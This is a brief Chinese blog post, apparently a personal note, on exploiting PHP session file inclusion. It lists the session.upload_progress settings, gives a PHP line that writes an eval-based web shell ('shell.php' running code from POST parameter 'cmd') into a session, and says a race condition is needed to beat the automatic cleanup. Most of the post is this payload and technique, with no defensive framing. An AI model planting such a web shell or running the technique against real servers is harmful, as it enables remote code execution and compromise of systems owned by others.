session包含

一、配置

session.save_path       //session文件存储地址
session.upload_progress.enabled      //session文件上传上传
session.upload_progress.cleanup     //定时清空文件

二、写入session一句话

<?php

fputs(fopen('shell.php','w'),'<?php @eval($_POST["cmd"]);?>');

?>

三、文件竞争

session.upload_progress.cleanup开启,所以上传的内容会删除,所以需要需要文件竞争

posted @ 2020-12-04 15:40  lnterpreter  阅读(1280)  评论(0编辑  收藏  举报